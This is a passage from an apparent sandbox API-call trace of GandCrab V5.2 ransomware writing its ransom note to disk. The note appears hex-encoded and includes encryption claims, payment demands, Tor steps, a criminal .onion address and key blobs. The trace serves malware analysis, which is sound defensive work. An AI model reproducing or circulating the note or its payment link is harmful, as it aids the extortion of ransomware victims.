(lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.124] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Templates\\\\TITWMVJL-DECRYPT.txt") returned 53 [0095.124] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Templates\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\templates\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0095.126] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.126] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0095.127] CloseHandle (hObject=0x230) returned 1 [0095.127] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.127] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.127] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x1bf)) [0095.127] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 